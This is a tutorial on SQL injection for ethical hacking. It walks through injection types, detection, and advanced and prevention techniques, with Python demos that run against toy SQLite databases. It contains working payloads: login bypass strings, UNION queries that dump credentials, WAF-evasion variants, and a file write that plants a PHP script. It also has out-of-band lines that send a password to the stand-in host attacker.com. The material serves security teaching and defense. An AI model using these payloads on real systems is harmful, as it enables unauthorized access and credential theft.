Complete Guide to Learning SQL Injection (SQLi) - Ethical Hacking Tutorial
SQL Injection (SQLi) remains one of the most critical web application vulnerabilities, consistently ranking in the OWASP Top 10. This comprehensive guide will teach you how to learn SQL Injection ethically, set up practice labs, and master detection and exploitation techniques for penetration testing and security research.
Prerequisites for Learning SQL Injection
Before diving into SQLi, you should have:
- Basic understanding of how websites work (client-server architecture)
- Fundamental knowledge of SQL (Structured Query Language)
- Familiarity with web technologies (HTML, PHP, JavaScript)
- Basic command line skills
Step 1: Learn SQL Fundamentals
SQL Injection manipulates database queries, so you must understand SQL first:
Key SQL Concepts to Master:
- SELECT, INSERT, UPDATE, DELETE statements
- UNION operator for combining queries
- WHERE clauses and conditional operators
- JOIN operations between tables
- Database schemas and information_schema
- Comments in SQL: -- (MySQL only treats it as a comment when followed by a space or control character), # (MySQL only) and /* */
Step 2: Set Up Your SQLi Learning Environment
Recommended Lab Setup:
- Virtual Machine: Use VirtualBox or VMware
- Kali Linux: Pre-installed with security tools
- Vulnerable Web Apps: Install intentionally vulnerable applications
- Database Servers: MySQL, PostgreSQL, MSSQL for practice
Best Vulnerable Apps for SQLi Practice:
- DVWA (Damn Vulnerable Web App): Beginner-friendly with security levels
- OWASP Juice Shop: Modern vulnerable web app
- WebGoat: OWASP's deliberately insecure app
- SQLi Labs: Dedicated SQL injection practice
- Mutillidae II: Another excellent vulnerable web app
Step 3: Understand SQL Injection Types
SQL Injection comes in several forms. Learn to recognize each type:
1. Classic (In-Band) SQL Injection
The application concatenates user input straight into the query. Entering ' OR '1'='1 in the password field turns the WHERE clause into a condition that is true for every row, so the query becomes:
SELECT * FROM users WHERE username = 'admin' AND password = 'password' OR '1'='1'
2. Union-Based SQLi
Appending a UNION SELECT returns rows from another table inside the page's normal output. The injected SELECT must return the same number of columns, with compatible types, as the original query:
SELECT name, description FROM products WHERE id=1 UNION SELECT username, password FROM users--
3. Error-Based SQLi
Forcing a database error whose message echoes the injected value. In MySQL 5.6+, GTID_SUBSET() rejects a non-GTID argument with "Malformed GTID set specification '...'" and quotes the offending value, here the server version:
SELECT * FROM users WHERE id=1 AND GTID_SUBSET(@@version,0)--
4. Blind SQLi (Boolean and Time-Based)
No data appears in the response; it is inferred one character at a time from whether the page changes (boolean) or how long it takes to respond (time-based). Boolean: the page returns the id=1 row only if the first character of admin's password is 'a':
SELECT * FROM users WHERE id=1 AND SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)='a'
Time-based, Microsoft SQL Server syntax using a stacked query (MySQL uses SLEEP(), PostgreSQL pg_sleep()):
SELECT * FROM users WHERE id=1; IF (SUBSTRING((SELECT password FROM users WHERE username='admin'),1,1)='a') WAITFOR DELAY '0:0:5'--
5. Out-of-Band SQLi
Making the database server itself send the data to an attacker-controlled host over DNS or HTTP, useful when the response carries no data and timing is unreliable. On Microsoft SQL Server, xp_dirtree on a UNC path triggers a DNS lookup of the hostname, so the value to exfiltrate has to be placed in the hostname, not in the path. Extended procedures only accept constants or variables as arguments, so the path is assembled in a variable first:
SELECT * FROM users WHERE id=1; DECLARE @p VARCHAR(1024); SET @p='\\'+(SELECT password FROM users WHERE username='admin')+'.attacker.com\x'; EXEC master..xp_dirtree @p--
Step 4: SQL Injection Detection Techniques
Manual Detection Methods:
- Single Quote Test: Add a single quote (') to an input and look for a database error or a changed response
- Boolean Tests: Append AND 1=1 (true) and AND 1=2 (false); if the page differs between the two, the input reaches the query
- Time-Based Tests: Inject a sleep or delay and compare response times to detect blind SQLi
- Error Provocation: Break the query syntax deliberately and check whether error details leak into the response
Automated Tools for SQLi Detection:
- sqlmap: The most widely used automated SQL injection detection and exploitation tool
- Burp Suite: Professional web security testing tool
- OWASP ZAP: Open source web app security scanner
- Havij: User-friendly SQL injection tool (Windows)
Step 5: Hands-on SQL Injection Practice
Practical SQLi Exercises:
Exercise 1: Bypass Authentication
- Find a login page in your vulnerable app
- Enter the classic payload in the password field:
' OR '1'='1
- Try the comment variations in the username field, which cut off the password check (keep the space after -- ; MySQL ignores -- without it, and # only works on MySQL):
admin'-- 
admin'#
Exercise 2: Extract Database Information
- Find a vulnerable parameter (product ID, username, etc.)
- Determine the number of columns the original query selects: increase ORDER BY n until the database errors (the last n that works is the count), or add UNION SELECT NULL placeholders until no error occurs
- Use UNION with that many columns to read the database version, then table and column names from information_schema (or the DBMS's equivalent catalogue), then the data itself
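The detection checks from Step 4 and the column-count and UNION steps of Exercise 2, together with the boolean-blind inference from Step 3, run end to end against a toy lookup endpoint. This is an added example, not code from the original guide or from any of the lab applications above; the products and users tables, their rows, and the vulnerable_lookup function are constructed for the demo, and SQLite is used so it runs offline (SQLite has no information_schema, its catalogue table is sqlite_master).

```python
import sqlite3

def build_db() -> sqlite3.Connection:
    # Constructed sample data for the demo; nothing here comes from a real system.
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT, description TEXT);
        INSERT INTO products VALUES (1, 'Widget', 'A small widget');
        INSERT INTO products VALUES (2, 'Gadget', 'A shiny gadget');
        CREATE TABLE users (id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 's3cret');
        INSERT INTO users VALUES (2, 'bob', 'hunter2');
    """)
    return con

CON = build_db()

def vulnerable_lookup(product_id: str):
    """Deliberately vulnerable endpoint: the id parameter is concatenated into
    the SQL text. Returns (rows, error_message) like a verbose web page would."""
    sql = f"SELECT name, description FROM products WHERE id={product_id}"
    try:
        return CON.execute(sql).fetchall(), None
    except sqlite3.Error as exc:
        return [], str(exc)

# Step 4: manual detection via single quote and boolean differential
def detect(param_value: str) -> dict:
    baseline, _ = vulnerable_lookup(param_value)
    _, quote_err = vulnerable_lookup(param_value + "'")          # single-quote test
    true_rows, _ = vulnerable_lookup(param_value + " AND 1=1")   # always-true condition
    false_rows, _ = vulnerable_lookup(param_value + " AND 1=2")  # always-false condition
    return {
        "quote_causes_error": quote_err is not None,
        "boolean_differs": true_rows == baseline and false_rows != baseline,
    }

# Exercise 2: column count via ORDER BY, then UNION extraction
def find_column_count(param_value: str, max_cols: int = 10) -> int:
    """ORDER BY n fails as soon as n exceeds the number of selected columns."""
    for n in range(1, max_cols + 1):
        _, err = vulnerable_lookup(f"{param_value} ORDER BY {n}")
        if err:
            return n - 1
    raise RuntimeError("column count not found")

def union_dump(param_value: str) -> list:
    """Pulls username/password pairs through a UNION of matching width.
    id=-1 makes the original query return nothing, so only injected rows show.
    Assumes the original query selects at least two columns."""
    ncols = find_column_count(param_value)
    cols = ["username", "password"] + ["NULL"] * (ncols - 2)  # pad with NULLs
    rows, _ = vulnerable_lookup(f"-1 UNION SELECT {', '.join(cols)} FROM users")
    return rows

# Step 3, type 4: boolean-based blind extraction, one character at a time
def blind_extract(param_value: str, subquery: str, max_len: int = 32) -> str:
    """Recovers the subquery's string result using only a yes/no oracle
    (does the baseline row come back or not), never seeing the value directly."""
    baseline, _ = vulnerable_lookup(param_value)
    result = ""
    for pos in range(1, max_len + 1):
        for code in range(32, 127):  # printable ASCII
            cond = f"UNICODE(SUBSTR(({subquery}),{pos},1))={code}"
            rows, _ = vulnerable_lookup(f"{param_value} AND {cond}")
            if rows == baseline:
                result += chr(code)
                break
        else:
            break  # no character matched at this position: end of string
    return result

if __name__ == "__main__":
    print(detect("1"))
    print(find_column_count("1"))
    print(union_dump("1"))
    print(blind_extract("1", "SELECT password FROM users WHERE username='admin'"))
```

The blind loop issues up to 95 requests per character; against a real target you would binary-search on the code point (UNICODE(...) > 64, and so on) to cut that to about seven, which is what sqlmap does.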
Step 6: Advanced SQL Injection Techniques
1. Second-Order SQL Injection
The malicious input is stored safely at first (for example by a parameterized INSERT at registration) and only becomes dangerous when another part of the application later reads it back and concatenates it into a query. A user registers with the name admin'-- , which is saved literally:
INSERT INTO users (username, password) VALUES ('admin''--', 'x');
Later, a password-change feature builds its query from the stored username, and the comment removes the password check so the real admin account is updated:
UPDATE users SET password='new' WHERE username='admin'--' AND password='x'
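The two-stage flow above as a runnable demonstration. This is an added example, not code from the original guide; the users table, the row for admin, the register and password-change functions and the attacker's chosen username are all constructed for the demo, with SQLite standing in for the database.

```python
import sqlite3

def fresh_db() -> sqlite3.Connection:
    # Constructed sample data: one legitimate admin account.
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'admin-original');
    """)
    return con

def register(con: sqlite3.Connection, username: str, password: str) -> None:
    # First order is safe: bound parameters store the quote and -- as plain text.
    con.execute("INSERT INTO users VALUES (?, ?)", (username, password))

def change_password_vulnerable(con, username: str, old_pw: str, new_pw: str) -> str:
    # Second order is not: the username read back from the database is trusted
    # and concatenated. Returns the SQL actually executed, for inspection.
    sql = (f"UPDATE users SET password='{new_pw}' "
           f"WHERE username='{username}' AND password='{old_pw}'")
    con.execute(sql)
    return sql

def change_password_safe(con, username: str, old_pw: str, new_pw: str) -> None:
    con.execute("UPDATE users SET password=? WHERE username=? AND password=?",
                (new_pw, username, old_pw))

def password_of(con, username: str) -> str:
    return con.execute("SELECT password FROM users WHERE username=?",
                       (username,)).fetchone()[0]

def demo(safe: bool) -> str:
    """Registers the attacker, lets them change their own password, and
    returns the real admin's password afterwards."""
    con = fresh_db()
    attacker_name = "admin'--"
    register(con, attacker_name, "x")
    # The application later loads the username exactly as stored...
    stored_name = con.execute("SELECT username FROM users WHERE username=?",
                              (attacker_name,)).fetchone()[0]
    # ...and uses it to update "their" password.
    if safe:
        change_password_safe(con, stored_name, "x", "pwned")
    else:
        change_password_vulnerable(con, stored_name, "x", "pwned")
    return password_of(con, "admin")

if __name__ == "__main__":
    print("vulnerable path, admin password is now:", demo(safe=False))
    print("safe path, admin password is still:   ", demo(safe=True))
```

The lesson is that "this value came from our own database" is not a trust boundary: every query that builds SQL from data, wherever that data originated, needs parameters.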
2. Bypassing WAFs (Web Application Firewalls)
Signature-based filters look for patterns such as "UNION SELECT". Inline comments and unusual whitespace can break the pattern while the database still parses the query, but they must sit between tokens: splitting a keyword itself (SEL/**/ECT) does not work, since the comment is a token separator. MySQL additionally executes version comments of the form /*!50000 ... */ that a filter may treat as plain comments:
SELECT/*bypass*/* FROM users WHERE id=1
UNION%0bSELECT 1,2,3
/*!50000UNION*//*!50000SELECT*/ 1,2,3
3. Out-of-Band Data Exfiltration
The MySQL variant of the DNS technique: on a Windows host, LOAD_FILE() on a UNC path makes the server resolve the hostname, carrying the extracted value in a subdomain. It requires the FILE privilege and a Windows MySQL server, so it is far less common than the SQL Server form:
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM users LIMIT 1),'.attacker.com\\share\\'))
4. File System Operations
Reading and writing files when conditions allow. In MySQL, INTO OUTFILE writes the result set to a path on the database server; if the database runs on the same host as the web server, the account has the FILE privilege, secure_file_priv does not restrict the location and the webroot is writable, a selected string becomes a server-side script:
SELECT '<?php echo "test"; ?>' INTO OUTFILE '/var/www/html/test.php'
Step 7: Learn SQL Injection Prevention
To be a complete security professional, you must understand defenses:
SQLi Mitigation Techniques:
- Prepared Statements (Parameterized Queries): The most effective defense; the query text and the data travel separately, so input can never change the query's structure
- Stored Procedures: Only if the procedure itself uses parameters and does not build dynamic SQL from concatenated strings (EXEC or sp_executesql on a string built from arguments is still injectable)
- Input Validation: Allow-listing, especially for values that cannot be parameterized such as table and column names in ORDER BY, and proper sanitization
- Least Privilege: Database accounts with minimal permissions, so a successful injection cannot read other schemas, write files or run OS commands
- Web Application Firewalls: As a secondary defense only; see the bypass techniques above
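The Exercise 1 login written both ways, plus the one case parameters cannot cover: a user-selectable sort column, which is an identifier and cannot be bound, so it is mapped onto an allow-list instead. This is an added example, not code from the original guide; the users table, its rows and the function names are constructed for the demo, and passwords are stored in plaintext only to keep the injection visible (a real application stores password hashes).

```python
import sqlite3

def make_db() -> sqlite3.Connection:
    # Constructed sample data for the demo.
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE users (username TEXT, password TEXT, created_at TEXT);
        INSERT INTO users VALUES ('admin', 's3cret',  '2024-01-01');
        INSERT INTO users VALUES ('bob',   'hunter2', '2024-02-01');
    """)
    return con

CON = make_db()

def login_vulnerable(username: str, password: str) -> bool:
    # String concatenation: the quote in the input becomes SQL syntax.
    sql = (f"SELECT 1 FROM users WHERE username='{username}' "
           f"AND password='{password}'")
    return CON.execute(sql).fetchone() is not None

def login_safe(username: str, password: str) -> bool:
    # Placeholders: the driver passes the values separately from the query
    # text, so ' OR '1'='1 is compared literally against the password column.
    row = CON.execute("SELECT 1 FROM users WHERE username=? AND password=?",
                      (username, password)).fetchone()
    return row is not None

# Identifiers (table and column names) cannot be bound as parameters, so the
# user's choice is mapped onto a fixed allow-list before it touches the query.
ALLOWED_SORT = {"username", "created_at"}

def list_users(sort_by: str, descending: bool = False) -> list:
    if sort_by not in ALLOWED_SORT:
        raise ValueError(f"unsupported sort column: {sort_by!r}")
    direction = "DESC" if descending else "ASC"
    sql = f"SELECT username FROM users ORDER BY {sort_by} {direction}"
    return [row[0] for row in CON.execute(sql)]

if __name__ == "__main__":
    payload = "' OR '1'='1"
    print("vulnerable login with payload:", login_vulnerable("admin", payload))
    print("safe login with payload:      ", login_safe("admin", payload))
    print("safe login, real password:    ", login_safe("admin", "s3cret"))
    print("sorted by created_at desc:    ", list_users("created_at", descending=True))
```

The allow-list check is deliberately a set membership test rather than a regular expression or quote-stripping: with a closed set of valid identifiers there is nothing to sanitize, and anything outside the set is rejected before any SQL is built.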
Recommended Learning Path
- Week 1: Learn SQL fundamentals and set up lab environment
- Week 2: Practice classic SQLi on DVWA and WebGoat
- Week 3: Master union-based and error-based SQLi
- Week 4: Learn blind SQLi techniques
- Week 5: Explore advanced topics and WAF bypass
- Week 6: Practice on CTF challenges and real-world scenarios
Certifications for SQL Injection Knowledge
Validate your skills with these certifications:
- OSCP (Offensive Security Certified Professional): Includes web app testing
- CEH (Certified Ethical Hacker): Covers SQLi fundamentals
- eWPT (eLearnSecurity Web Penetration Tester): Focused on web apps
- Burp Suite Certified Practitioner: Web security practical exam
Conclusion
Mastering SQL Injection requires patience and practice. Start with basic techniques in controlled environments before progressing to more advanced methods. Remember that ethical hacking is about improving security - always get proper authorization before testing systems you don't own.
By following this structured learning path, practicing regularly, and staying updated with new techniques and defenses, you'll develop valuable skills in web application security that are highly sought after in the cybersecurity industry.